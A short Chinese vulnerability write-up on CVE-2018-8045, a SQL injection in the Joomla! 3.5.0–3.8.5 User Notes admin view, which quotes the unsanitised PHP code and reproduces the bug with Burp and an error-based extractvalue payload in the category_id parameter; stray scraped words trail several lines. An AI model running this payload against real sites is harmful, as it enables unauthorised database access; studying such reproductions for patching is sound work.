CVE-2018-8045

Joomla!Core SQL注入漏洞

CVE-2018-8045php

受影響版本:joomla!3.5.0-3.8.5git

漏洞描述:github

  joomla!3.5.0-3.8.5版本對sql語句內的變量缺乏類型轉換,致使User Notes列表視圖內SQL注入漏洞。sql

從github上下載代碼並安裝。this

0x01 漏洞產生緣由 

產生漏洞的文件爲:"/administrator/components/com_users/models/notes.php";url

代碼在126-121行spa

 

        $categoryId = $this->getState('filter.category_id');

        if ($categoryId && is_scalar($categoryId))
        {
            $query->where('a.catid = ' . $categoryId);
        }

 

很明顯$categoryId變量沒有過濾或者類型轉換直接帶入SQL語句執行。致使SQL注入漏洞產生。scala

0x02 漏洞利用

訪問url:http://localhost/joomla/administrator/index.php?option=com_users&view=notescode

選擇Search Tools選項並選擇Uncategorised便可觸發漏洞條件,這時候用burp抓包。component

發現category_id參數,咱們在repeater中發包,將該參數值改成7 and extractvalue(1,concat(0x7e,(select database()),0x7e)) 

 

成功復現漏洞。

本站公眾號
   歡迎關注本站公眾號,獲取更多信息